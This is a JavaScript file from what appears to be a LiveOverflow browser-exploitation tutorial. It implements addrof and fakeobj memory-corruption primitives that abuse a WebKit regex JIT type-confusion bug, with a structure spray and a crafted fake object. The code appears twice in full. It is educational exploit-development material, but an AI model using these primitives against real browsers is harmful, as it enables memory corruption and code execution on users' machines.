LiveOverflow/test.js

## test.js
// based on: https://github.com/LinusHenze/WebKit-RegEx-Exploit
// tutorial: https://liveoverflow.com/tag/browser-exploitation/
// playlist: https://www.youtube.com/watch?v=5tEdSoZ3mmE&list=PLhixgUqwRTjwufDsT1ntgOY9yjZgg5H_t

// addrof primitive
function addrof(val) {
    var array = [13.37];
    var reg = /abc/y;

    // Target function
    var AddrGetter = function(array) {
        //reg[Symbol.match]();
        "abc".match(reg);
        return array[0];
    }

    // Force optimization
    for (var i = 0; i < 10000; ++i)
        AddrGetter(array);

    // Setup haxx
    regexLastIndex = {};
    regexLastIndex.toString = function() {
        array[0] = val;
        return "0";
    };
    reg.lastIndex = regexLastIndex;

    // Do it!
    return AddrGetter(array);
}

// fakeobj primitive
function fakeobj(dbl) {
    var array = [13.37];
    var reg = /abc/y;

    // Target function
    var AddrSetter = function(array) {
        //reg[Symbol.match]();
        "abc".match(reg);
        array[0] = dbl;
    }

    // Force optimization
    for (var i = 0; i < 10000; ++i)
        AddrSetter(array);

    // Setup haxx
    regexLastIndex = {};
    regexLastIndex.toString = function() {
        array[0] = {};
        return "0";
    };
    reg.lastIndex = regexLastIndex;

    // Do it!
    AddrSetter(array);
    return array[0];
}

for(var i=0; i<0x2000; i++) {
    test = {}
    test.x = 1
    test['prop_'+i] = 2
}

fake = {}
fake.a = 7.082855106403439e-304
fake.b = 2
fake.c = 1337
delete fake.b

adr = addrof(fake)

print(adr)

// should return the same object. to fake the object you have to first move the address forward 0x10. See the video for how to do that with python
hax = fakeobj(adr)
	// based on: https://github.com/LinusHenze/WebKit-RegEx-Exploit
	// tutorial: https://liveoverflow.com/tag/browser-exploitation/
	// playlist: https://www.youtube.com/watch?v=5tEdSoZ3mmE&list=PLhixgUqwRTjwufDsT1ntgOY9yjZgg5H_t

	// addrof primitive
	function addrof(val) {
	var array = [13.37];
	var reg = /abc/y;

	// Target function
	var AddrGetter = function(array) {
	//reg[Symbol.match]();
	"abc".match(reg);
	return array[0];
	}

	// Force optimization
	for (var i = 0; i < 10000; ++i)
	AddrGetter(array);

	// Setup haxx
	regexLastIndex = {};
	regexLastIndex.toString = function() {
	array[0] = val;
	return "0";
	};
	reg.lastIndex = regexLastIndex;

	// Do it!
	return AddrGetter(array);
	}

	// fakeobj primitive
	function fakeobj(dbl) {
	var array = [13.37];
	var reg = /abc/y;

	// Target function
	var AddrSetter = function(array) {
	//reg[Symbol.match]();
	"abc".match(reg);
	array[0] = dbl;
	}

	// Force optimization
	for (var i = 0; i < 10000; ++i)
	AddrSetter(array);

	// Setup haxx
	regexLastIndex = {};
	regexLastIndex.toString = function() {
	array[0] = {};
	return "0";
	};
	reg.lastIndex = regexLastIndex;

	// Do it!
	AddrSetter(array);
	return array[0];
	}

	for(var i=0; i<0x2000; i++) {
	test = {}
	test.x = 1
	test['prop_'+i] = 2
	}

	fake = {}
	fake.a = 7.082855106403439e-304
	fake.b = 2
	fake.c = 1337
	delete fake.b

	adr = addrof(fake)

	print(adr)

	// should return the same object. to fake the object you have to first move the address forward 0x10. See the video for how to do that with python
	hax = fakeobj(adr)